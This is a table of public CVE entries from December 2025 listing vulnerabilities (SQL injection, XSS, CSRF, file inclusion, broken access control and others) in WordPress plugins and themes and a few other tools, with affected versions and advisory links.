| vcita--Online Booking & Scheduling Calendar for WordPress by vcita | Cross-Site Request Forgery (CSRF) vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita meeting-scheduler-by-vcita allows Cross Site Request Forgery. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through <= 4.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67472 | https://vdp.patchstack.com/database/Wordpress/Plugin/meeting-scheduler-by-vcita/vulnerability/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| codeworkweb--CWW Companion | Cross-Site Request Forgery (CSRF) vulnerability in codeworkweb CWW Companion cww-companion allows Cross Site Request Forgery. This issue affects CWW Companion: from n/a through <= 1.3.2. | 2025-12-09 | not yet calculated | CVE-2025-67473 | https://vdp.patchstack.com/database/Wordpress/Plugin/cww-companion/vulnerability/wordpress-cww-companion-plugin-1-3-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Ultimate Member--ForumWP | Missing Authorization vulnerability in Ultimate Member ForumWP forumwp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects ForumWP: from n/a through <= 2.1.4. | 2025-12-09 | not yet calculated | CVE-2025-67474 | https://vdp.patchstack.com/database/Wordpress/Plugin/forumwp/vulnerability/wordpress-forumwp-plugin-2-1-4-broken-access-control-vulnerability?_s_id=cve |
| static-web-server--static-web-server | Static Web Server (SWS) is a production-ready web server suitable for static web files or assets. Versions 2.40.0 and below follow symbolic links (symlinks) that point outside the intended web root folder, so such links can be used to access files or directories beyond it. SWS generally does not prevent symlinks from escaping the web server's root directory; therefore, if a malicious actor gains access to the web server's root directory, they could create symlinks that expose other files outside the designated web root, either by URL or via the directory listing. This issue is fixed in version 2.40.1. | 2025-12-09 | not yet calculated | CVE-2025-67487 | https://github.com/static-web-server/static-web-server/security/advisories/GHSA-459f-x8vq-xjjm https://github.com/static-web-server/static-web-server/commit/308f0d26ceb9c2c8bd219315d0f53914763357f2 |
| LabRedesCefetRJ--WeGIA | WeGIA is an open source Web Manager for Institutions with a focus on Portuguese language users. Versions 3.5.4 and below contain an SQL Injection vulnerability in the /html/matPat/editar_categoria.php endpoint. The application fails to properly validate and sanitize user inputs in the id_categoria parameter, which allows attackers to inject malicious SQL payloads for direct execution. This issue is fixed in version 3.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67501 | https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-hj2x-qfm3-2869 https://github.com/LabRedesCefetRJ/WeGIA/commit/f04b91f584a38c2061a071b26219dba3f25819e6 https://github.com/LabRedesCefetRJ/WeGIA/releases/tag/3.5.5 |
| gardener--gardenctl-v2 | gardenctl is a command-line client for Gardener that configures access to clusters and cloud provider CLI tools. When non-POSIX shells such as Fish and PowerShell are used, versions 2.11.0 and below of gardenctl allow an attacker with administrative privileges for a Gardener project to craft malicious credential values. The forged values, stored in infrastructure Secret objects, break out of the intended string context when evaluated in the Fish or PowerShell environments used by Gardener service operators. This issue is fixed in version 2.12.0. | 2025-12-12 | not yet calculated | CVE-2025-67508 | https://github.com/gardener/gardenctl-v2/security/advisories/GHSA-fw33-qpx7-rhx2 |
| FreePBX--security-reporting | FreePBX Endpoint Manager is a module for managing telephony endpoints in FreePBX systems. Versions prior to 16.0.96, and 17.0.1 through 17.0.9, have a weak default password: by default it is a 6-digit numeric value (the app_password parameter), which can be brute-forced. Depending on local configuration, this password may be the extension, voicemail, user manager, DPMA or EPM phone admin password. This issue is fixed in versions 16.0.96 and 17.0.10. | 2025-12-10 | not yet calculated | CVE-2025-67513 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-426v-c5p7-cp29 |
| Mikado-Themes--Wilmër | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wilmër wilmer allows PHP Local File Inclusion. This issue affects Wilmër: from n/a through < 3.5. | 2025-12-09 | not yet calculated | CVE-2025-67515 | https://vdp.patchstack.com/database/Wordpress/Theme/wilmer/vulnerability/wordpress-wilmer-theme-3-5-local-file-inclusion-vulnerability?_s_id=cve |
| Agile Logix--Store Locator WordPress | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Agile Logix Store Locator WordPress agile-store-locator allows Blind SQL Injection. This issue affects Store Locator WordPress: from n/a through <= 1.6.2. | 2025-12-09 | not yet calculated | CVE-2025-67516 | https://vdp.patchstack.com/database/Wordpress/Plugin/agile-store-locator/vulnerability/wordpress-store-locator-wordpress-plugin-1-6-2-sql-injection-vulnerability?_s_id=cve |
| artplacer--ArtPlacer Widget | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in artplacer ArtPlacer Widget artplacer-widget allows Blind SQL Injection. This issue affects ArtPlacer Widget: from n/a through <= 2.22.9.2. | 2025-12-09 | not yet calculated | CVE-2025-67517 | https://vdp.patchstack.com/database/Wordpress/Plugin/artplacer-widget/vulnerability/wordpress-artplacer-widget-plugin-2-22-9-2-sql-injection-vulnerability?_s_id=cve |
| LambertGroup--Accordion Slider PRO | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Accordion Slider PRO accordion_slider_pro allows Blind SQL Injection. This issue affects Accordion Slider PRO: from n/a through <= 1.2. | 2025-12-09 | not yet calculated | CVE-2025-67518 | https://vdp.patchstack.com/database/Wordpress/Plugin/accordion_slider_pro/vulnerability/wordpress-accordion-slider-pro-plugin-1-2-sql-injection-vulnerability?_s_id=cve |
| Shahjahan Jewel--Ninja Tables | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjahan Jewel Ninja Tables ninja-tables allows SQL Injection. This issue affects Ninja Tables: from n/a through <= 5.2.3. | 2025-12-09 | not yet calculated | CVE-2025-67519 | https://vdp.patchstack.com/database/Wordpress/Plugin/ninja-tables/vulnerability/wordpress-ninja-tables-plugin-5-2-3-sql-injection-vulnerability?_s_id=cve |
| Tiny Solutions--Media Library Tools | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tiny Solutions Media Library Tools media-library-tools allows SQL Injection. This issue affects Media Library Tools: from n/a through <= 1.6.15. | 2025-12-09 | not yet calculated | CVE-2025-67520 | https://vdp.patchstack.com/database/Wordpress/Plugin/media-library-tools/vulnerability/wordpress-media-library-tools-plugin-1-6-15-sql-injection-vulnerability?_s_id=cve |
| Select-Themes--Select Core | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Select Core select-core allows PHP Local File Inclusion. This issue affects Select Core: from n/a through < 2.6. | 2025-12-09 | not yet calculated | CVE-2025-67521 | https://vdp.patchstack.com/database/Wordpress/Plugin/select-core/vulnerability/wordpress-select-core-plugin-2-6-local-file-inclusion-vulnerability?_s_id=cve |
| NooTheme--Jobmonster | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster noo-jobmonster allows PHP Local File Inclusion. This issue affects Jobmonster: from n/a through <= 4.8.2. | 2025-12-09 | not yet calculated | CVE-2025-67522 | https://vdp.patchstack.com/database/Wordpress/Theme/noo-jobmonster/vulnerability/wordpress-jobmonster-theme-4-8-2-local-file-inclusion-vulnerability?_s_id=cve |
| trippleS--Exhibz | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Exhibz exhibz allows PHP Local File Inclusion. This issue affects Exhibz: from n/a through <= 3.0.9. | 2025-12-09 | not yet calculated | CVE-2025-67523 | https://vdp.patchstack.com/database/Wordpress/Theme/exhibz/vulnerability/wordpress-exhibz-theme-3-0-9-local-file-inclusion-vulnerability?_s_id=cve |
| NooTheme--Jobmonster Elementor Addon | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in NooTheme Jobmonster Elementor Addon jobmonster-addon allows PHP Local File Inclusion. This issue affects Jobmonster Elementor Addon: from n/a through <= 1.1.4. | 2025-12-09 | not yet calculated | CVE-2025-67524 | https://vdp.patchstack.com/database/Wordpress/Plugin/jobmonster-addon/vulnerability/wordpress-jobmonster-elementor-addon-plugin-1-1-4-local-file-inclusion-vulnerability?_s_id=cve |
| Opal_WP--ekommart | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Opal_WP ekommart ekommart allows PHP Local File Inclusion. This issue affects ekommart: from n/a through < 4.3.1. | 2025-12-09 | not yet calculated | CVE-2025-67525 | https://vdp.patchstack.com/database/Wordpress/Theme/ekommart/vulnerability/wordpress-ekommart-theme-4-3-1-local-file-inclusion-vulnerability?_s_id=cve |
| ThimPress--Sailing | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ThimPress Sailing sailing allows PHP Local File Inclusion. This issue affects Sailing: from n/a through < 4.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67526 | https://vdp.patchstack.com/database/Wordpress/Theme/sailing/vulnerability/wordpress-sailing-theme-4-4-6-local-file-inclusion-vulnerability?_s_id=cve |
| trippleS--Digiqole | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Digiqole digiqole allows PHP Local File Inclusion. This issue affects Digiqole: from n/a through < 2.2.7. | 2025-12-09 | not yet calculated | CVE-2025-67527 | https://vdp.patchstack.com/database/Wordpress/Theme/digiqole/vulnerability/wordpress-digiqole-theme-2-2-7-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Urna | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Urna urna allows PHP Local File Inclusion. This issue affects Urna: from n/a through <= 2.5.12. | 2025-12-09 | not yet calculated | CVE-2025-67528 | https://vdp.patchstack.com/database/Wordpress/Theme/urna/vulnerability/wordpress-urna-theme-2-5-12-local-file-inclusion-vulnerability?_s_id=cve |
| Opal_WP--Fashion | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Opal_WP Fashion fashion2 allows PHP Local File Inclusion. This issue affects Fashion: from n/a through < 5.3.0. | 2025-12-09 | not yet calculated | CVE-2025-67529 | https://vdp.patchstack.com/database/Wordpress/Theme/fashion2/vulnerability/wordpress-fashion-theme-5-3-0-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Besa | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Besa besa allows PHP Local File Inclusion. This issue affects Besa: from n/a through <= 2.3.15. | 2025-12-09 | not yet calculated | CVE-2025-67530 | https://vdp.patchstack.com/database/Wordpress/Theme/besa/vulnerability/wordpress-besa-theme-2-3-15-local-file-inclusion-vulnerability?_s_id=cve |
| trippleS--Turitor | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in trippleS Turitor turitor allows PHP Local File Inclusion. This issue affects Turitor: from n/a through < 1.5.3. | 2025-12-09 | not yet calculated | CVE-2025-67531 | https://vdp.patchstack.com/database/Wordpress/Theme/turitor/vulnerability/wordpress-turitor-theme-1-5-3-local-file-inclusion-vulnerability?_s_id=cve |
| thembay--Hara | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in thembay Hara hara allows PHP Local File Inclusion. This issue affects Hara: from n/a through <= 1.2.17. | 2025-12-09 | not yet calculated | CVE-2025-67532 | https://vdp.patchstack.com/database/Wordpress/Theme/hara/vulnerability/wordpress-hara-theme-1-2-17-local-file-inclusion-vulnerability?_s_id=cve |
| themifyme--Themify Portfolio Post | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in themifyme Themify Portfolio Post themify-portfolio-post allows Stored XSS. This issue affects Themify Portfolio Post: from n/a through <= 1.3.0. | 2025-12-09 | not yet calculated | CVE-2025-67533 | https://vdp.patchstack.com/database/Wordpress/Plugin/themify-portfolio-post/vulnerability/wordpress-themify-portfolio-post-plugin-1-3-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jacques Malgrange--Rencontre | Cross-Site Request Forgery (CSRF) vulnerability in Jacques Malgrange Rencontre rencontre allows Stored XSS. This issue affects Rencontre: from n/a through <= 3.13.7. | 2025-12-09 | not yet calculated | CVE-2025-67534 | https://vdp.patchstack.com/database/Wordpress/Plugin/rencontre/vulnerability/wordpress-rencontre-plugin-3-13-7-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WePlugins - WordPress Development Company--WP Maps | Deserialization of Untrusted Data vulnerability in WePlugins - WordPress Development Company WP Maps wp-google-map-plugin allows Object Injection. This issue affects WP Maps: from n/a through <= 4.8.6. | 2025-12-09 | not yet calculated | CVE-2025-67535 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-google-map-plugin/vulnerability/wordpress-wp-maps-plugin-4-8-6-php-object-injection-vulnerability?_s_id=cve |
| ThimPress--LearnPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThimPress LearnPress learnpress allows Stored XSS. This issue affects LearnPress: from n/a through <= 4.2.9.4. | 2025-12-09 | not yet calculated | CVE-2025-67536 | https://vdp.patchstack.com/database/Wordpress/Plugin/learnpress/vulnerability/wordpress-learnpress-plugin-4-2-9-4-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Blair Williams--ThirstyAffiliates | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Blair Williams ThirstyAffiliates thirstyaffiliates allows Stored XSS. This issue affects ThirstyAffiliates: from n/a through <= 3.11.8. | 2025-12-09 | not yet calculated | CVE-2025-67537 | https://vdp.patchstack.com/database/Wordpress/Plugin/thirstyaffiliates/vulnerability/wordpress-thirstyaffiliates-plugin-3-11-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| jegtheme--JNews Gallery | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews Gallery jnews-gallery allows Stored XSS. This issue affects JNews Gallery: from n/a through < 12.0.1. | 2025-12-09 | not yet calculated | CVE-2025-67538 | https://vdp.patchstack.com/database/Wordpress/Plugin/jnews-gallery/vulnerability/wordpress-jnews-gallery-plugin-12-0-1-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Select-Themes--Select Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Select Core select-core allows DOM-Based XSS. This issue affects Select Core: from n/a through < 2.6. | 2025-12-09 | not yet calculated | CVE-2025-67539 | https://vdp.patchstack.com/database/Wordpress/Plugin/select-core/vulnerability/wordpress-select-core-plugin-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wealcoder--Animation Addons for Elementor | Missing Authorization vulnerability in Wealcoder Animation Addons for Elementor animation-addons-for-elementor allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Animation Addons for Elementor: from n/a through <= 2.4.5. | 2025-12-09 | not yet calculated | CVE-2025-67540 | https://vdp.patchstack.com/database/Wordpress/Plugin/animation-addons-for-elementor/vulnerability/wordpress-animation-addons-for-elementor-plugin-2-4-5-arbitrary-content-deletion-vulnerability?_s_id=cve |
| Lester Chan--WP-ShowHide | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Lester Chan WP-ShowHide wp-showhide allows Stored XSS. This issue affects WP-ShowHide: from n/a through <= 1.05. | 2025-12-09 | not yet calculated | CVE-2025-67541 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-showhide/vulnerability/wordpress-wp-showhide-plugin-1-05-cross-site-scripting-xss-vulnerability?_s_id=cve |
| SilkyPress--Multi-Step Checkout for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in SilkyPress Multi-Step Checkout for WooCommerce wp-multi-step-checkout allows DOM-Based XSS. This issue affects Multi-Step Checkout for WooCommerce: from n/a through <= 2.33. | 2025-12-09 | not yet calculated | CVE-2025-67542 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-multi-step-checkout/vulnerability/wordpress-multi-step-checkout-for-woocommerce-plugin-2-33-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Catch Themes--Essential Widgets | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Catch Themes Essential Widgets essential-widgets allows Stored XSS. This issue affects Essential Widgets: from n/a through <= 2.2.2. | 2025-12-09 | not yet calculated | CVE-2025-67543 | https://vdp.patchstack.com/database/Wordpress/Plugin/essential-widgets/vulnerability/wordpress-essential-widgets-plugin-2-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Get Bowtied--Shopkeeper Extender | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Get Bowtied Shopkeeper Extender shopkeeper-extender allows Stored XSS. This issue affects Shopkeeper Extender: from n/a through < 7.0. | 2025-12-09 | not yet calculated | CVE-2025-67544 | https://vdp.patchstack.com/database/Wordpress/Plugin/shopkeeper-extender/vulnerability/wordpress-shopkeeper-extender-plugin-7-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| FirePlugins--FireBox | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FirePlugins FireBox firebox allows Stored XSS. This issue affects FireBox: from n/a through <= 3.1.0-free. | 2025-12-09 | not yet calculated | CVE-2025-67545 | https://vdp.patchstack.com/database/Wordpress/Plugin/firebox/vulnerability/wordpress-firebox-plugin-3-1-0-free-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WP Delicious--WP Delicious | Missing Authorization vulnerability in WP Delicious WP Delicious delicious-recipes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WP Delicious: from n/a through <= 1.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67548 | https://vdp.patchstack.com/database/Wordpress/Plugin/delicious-recipes/vulnerability/wordpress-wp-delicious-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve |
| bobbingwide--oik | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bobbingwide oik oik allows DOM-Based XSS. This issue affects oik: from n/a through <= 4.15.3. | 2025-12-09 | not yet calculated | CVE-2025-67549 | https://vdp.patchstack.com/database/Wordpress/Plugin/oik/vulnerability/wordpress-oik-plugin-4-15-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| rhewlif--Donation Thermometer | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in rhewlif Donation Thermometer donation-thermometer allows Stored XSS. This issue affects Donation Thermometer: from n/a through <= 2.2.6. | 2025-12-09 | not yet calculated | CVE-2025-67550 | https://vdp.patchstack.com/database/Wordpress/Plugin/donation-thermometer/vulnerability/wordpress-donation-thermometer-plugin-2-2-6-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Wappointment team--Wappointment | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wappointment team Wappointment wappointment allows Stored XSS. This issue affects Wappointment: from n/a through <= 2.6.9. | 2025-12-09 | not yet calculated | CVE-2025-67551 | https://vdp.patchstack.com/database/Wordpress/Plugin/wappointment/vulnerability/wordpress-wappointment-plugin-2-6-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| WalkerWP--Walker Core | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WalkerWP Walker Core walker-core allows DOM-Based XSS. This issue affects Walker Core: from n/a through <= 1.3.17. | 2025-12-09 | not yet calculated | CVE-2025-67552 | https://vdp.patchstack.com/database/Wordpress/Plugin/walker-core/vulnerability/wordpress-walker-core-plugin-1-3-17-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeHigh--Advanced FAQ Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHigh Advanced FAQ Manager advanced-faq-manager allows DOM-Based XSS. This issue affects Advanced FAQ Manager: from n/a through <= 1.5.2. | 2025-12-09 | not yet calculated | CVE-2025-67553 | https://vdp.patchstack.com/database/Wordpress/Plugin/advanced-faq-manager/vulnerability/wordpress-advanced-faq-manager-plugin-1-5-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Humanityco--Cookie Notice & Compliance for GDPR / CCPA | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Humanityco Cookie Notice & Compliance for GDPR / CCPA cookie-notice allows Stored XSS. This issue affects Cookie Notice & Compliance for GDPR / CCPA: from n/a through <= 2.5.8. | 2025-12-09 | not yet calculated | CVE-2025-67554 | https://vdp.patchstack.com/database/Wordpress/Plugin/cookie-notice/vulnerability/wordpress-cookie-notice-compliance-for-gdpr-ccpa-plugin-2-5-8-cross-site-scripting-xss-vulnerability?_s_id=cve |
| useStrict--UseStrict's Calendly Embedder | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in useStrict UseStrict's Calendly Embedder cal-embedder-lite allows Stored XSS. This issue affects UseStrict's Calendly Embedder: from n/a through <= 1.1.7.2. | 2025-12-09 | not yet calculated | CVE-2025-67555 | https://vdp.patchstack.com/database/Wordpress/Plugin/cal-embedder-lite/vulnerability/wordpress-usestrict-s-calendly-embedder-plugin-1-1-7-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| ThemeHigh--Advanced FAQ Manager | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeHigh Advanced FAQ Manager advanced-faq-manager allows Stored XSS. This issue affects Advanced FAQ Manager: from n/a through <= 1.5.2. | 2025-12-09 | not yet calculated | CVE-2025-67556 | https://vdp.patchstack.com/database/Wordpress/Plugin/advanced-faq-manager/vulnerability/wordpress-advanced-faq-manager-plugin-1-5-2-cross-site-scripting-xss-vulnerability-2?_s_id=cve |
| Rhys Wynne--WP eBay Product Feeds | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Rhys Wynne WP eBay Product Feeds ebay-feeds-for-wordpress allows Stored XSS. This issue affects WP eBay Product Feeds: from n/a through <= 3.4.9. | 2025-12-09 | not yet calculated | CVE-2025-67557 | https://vdp.patchstack.com/database/Wordpress/Plugin/ebay-feeds-for-wordpress/vulnerability/wordpress-wp-ebay-product-feeds-plugin-3-4-9-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jacques Malgrange--Rencontre | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jacques Malgrange Rencontre rencontre allows Stored XSS. This issue affects Rencontre: from n/a through <= 3.13.7. | 2025-12-09 | not yet calculated | CVE-2025-67558 | https://vdp.patchstack.com/database/Wordpress/Plugin/rencontre/vulnerability/wordpress-rencontre-plugin-3-13-7-cross-site-scripting-xss-vulnerability?_s_id=cve |
| vcita--Online Booking & Scheduling Calendar for WordPress by vcita | Missing Authorization vulnerability in vcita Online Booking & Scheduling Calendar for WordPress by vcita meeting-scheduler-by-vcita allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Online Booking & Scheduling Calendar for WordPress by vcita: from n/a through <= 4.5.5. | 2025-12-09 | not yet calculated | CVE-2025-67559 | https://vdp.patchstack.com/database/Wordpress/Plugin/meeting-scheduler-by-vcita/vulnerability/wordpress-online-booking-scheduling-calendar-for-wordpress-by-vcita-plugin-4-5-5-broken-access-control-vulnerability?_s_id=cve |
| Webilia Inc.--Listdom | Missing Authorization vulnerability in Webilia Inc. Listdom listdom allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Listdom: from n/a through <= 5.0.1. | 2025-12-09 | not yet calculated | CVE-2025-67560 | https://vdp.patchstack.com/database/Wordpress/Plugin/listdom/vulnerability/wordpress-listdom-plugin-5-0-1-broken-access-control-vulnerability?_s_id=cve |
| Oleksandr Lysyi--Debug Log Viewer | Missing Authorization vulnerability in Oleksandr Lysyi Debug Log Viewer debug-log-viewer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Debug Log Viewer: from n/a through <= 2.0.3. | 2025-12-09 | not yet calculated | CVE-2025-67561 | https://vdp.patchstack.com/database/Wordpress/Plugin/debug-log-viewer/vulnerability/wordpress-debug-log-viewer-plugin-2-0-3-broken-access-control-vulnerability?_s_id=cve |
| WebCodingPlace--Image Caption Hover Pro | Missing Authorization vulnerability in WebCodingPlace Image Caption Hover Pro image-caption-hover-pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Image Caption Hover Pro: from n/a through < 20.0. | 2025-12-09 | not yet calculated | CVE-2025-67562 | https://vdp.patchstack.com/database/Wordpress/Plugin/image-caption-hover-pro/vulnerability/wordpress-image-caption-hover-pro-plugin-20-0-broken-access-control-vulnerability?_s_id=cve |
| Saad Iqbal--Post SMTP | Missing Authorization vulnerability in Saad Iqbal Post SMTP post-smtp allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Post SMTP: from n/a through <= 3.6.1. | 2025-12-09 | not yet calculated | CVE-2025-67563 | https://vdp.patchstack.com/database/Wordpress/Plugin/post-smtp/vulnerability/wordpress-post-smtp-plugin-3-6-1-broken-access-control-vulnerability?_s_id=cve |
| alekv--Pixel Manager for WooCommerce | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in alekv Pixel Manager for WooCommerce woocommerce-google-adwords-conversion-tracking-tag allows Retrieve Embedded Sensitive Data. This issue affects Pixel Manager for WooCommerce: from n/a through <= 1.51.1. | 2025-12-09 | not yet calculated | CVE-2025-67564 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-google-adwords-conversion-tracking-tag/vulnerability/wordpress-pixel-manager-for-woocommerce-plugin-1-51-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| sizam--Rehub | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in sizam Rehub rehub-theme allows Retrieve Embedded Sensitive Data. This issue affects Rehub: from n/a through <= 19.9.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67565 | https://vdp.patchstack.com/database/Wordpress/Theme/rehub-theme/vulnerability/wordpress-rehub-theme-19-9-9-1-sensitive-data-exposure-vulnerability?_s_id=cve |
| WofficeIO--Woffice Core | Missing Authorization vulnerability in WofficeIO Woffice Core woffice-core allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Woffice Core: from n/a through <= 5.4.30. | 2025-12-09 | not yet calculated | CVE-2025-67566 | https://vdp.patchstack.com/database/Wordpress/Plugin/woffice-core/vulnerability/wordpress-woffice-core-plugin-5-4-30-broken-access-control-vulnerability?_s_id=cve |
| uixthemes--Sober | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in uixthemes Sober sober allows Retrieve Embedded Sensitive Data. This issue affects Sober: from n/a through <= 3.5.11. | 2025-12-09 | not yet calculated | CVE-2025-67567 | https://vdp.patchstack.com/database/Wordpress/Theme/sober/vulnerability/wordpress-sober-theme-3-5-11-sensitive-data-exposure-vulnerability?_s_id=cve |
| xtemos--Basel | Missing Authorization vulnerability in xtemos Basel basel allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Basel: from n/a through <= 5.9.1. | 2025-12-09 | not yet calculated | CVE-2025-67568 | https://vdp.patchstack.com/database/Wordpress/Theme/basel/vulnerability/wordpress-basel-theme-5-9-1-broken-access-control-vulnerability?_s_id=cve |
| scriptsbundle--AdForest | Missing Authorization vulnerability in scriptsbundle AdForest adforest allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AdForest: from n/a through <= 6.0.11. | 2025-12-09 | not yet calculated | CVE-2025-67569 | https://vdp.patchstack.com/database/Wordpress/Theme/adforest/vulnerability/wordpress-adforest-theme-6-0-11-broken-access-control-vulnerability?_s_id=cve |
| GSheetConnector by WesternDeal--WPForms Google Sheet Connector | Missing Authorization vulnerability in GSheetConnector by WesternDeal WPForms Google Sheet Connector gsheetconnector-wpforms allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPForms Google Sheet Connector: from n/a through <= 4.0.0. | 2025-12-09 | not yet calculated | CVE-2025-67570 | https://vdp.patchstack.com/database/Wordpress/Plugin/gsheetconnector-wpforms/vulnerability/wordpress-wpforms-google-sheet-connector-plugin-4-0-0-broken-access-control-vulnerability?_s_id=cve |
| WPFunnels--WPFunnels | Missing Authorization vulnerability in WPFunnels WPFunnels wpfunnels allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WPFunnels: from n/a through <= 3.6.2. | 2025-12-09 | not yet calculated | CVE-2025-67571 | https://vdp.patchstack.com/database/Wordpress/Plugin/wpfunnels/vulnerability/wordpress-wpfunnels-plugin-3-6-2-broken-access-control-vulnerability?_s_id=cve |
| PenciDesign--PenNews | Missing Authorization vulnerability in PenciDesign PenNews pennews allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects PenNews: from n/a through < 6.7.4. | 2025-12-09 | not yet calculated | CVE-2025-67572 | https://vdp.patchstack.com/database/Wordpress/Theme/pennews/vulnerability/wordpress-pennews-theme-6-7-4-broken-access-control-vulnerability?_s_id=cve |
| ThimPress--Sailing | Missing Authorization vulnerability in ThimPress Sailing sailing allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Sailing: from n/a through < 4.4.6. | 2025-12-09 | not yet calculated | CVE-2025-67573 | https://vdp.patchstack.com/database/Wordpress/Theme/sailing/vulnerability/wordpress-sailing-theme-4-4-6-broken-access-control-vulnerability?_s_id=cve |
| wpdevart--Booking calendar, Appointment Booking System | Missing Authorization vulnerability in wpdevart Booking calendar, Appointment Booking System booking-calendar allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Booking calendar, Appointment Booking System: from n/a through <= 3.2.30. | 2025-12-09 | not yet calculated | CVE-2025-67574 | https://vdp.patchstack.com/database/Wordpress/Plugin/booking-calendar/vulnerability/wordpress-booking-calendar-appointment-booking-system-plugin-3-2-30-broken-access-control-vulnerability?_s_id=cve |
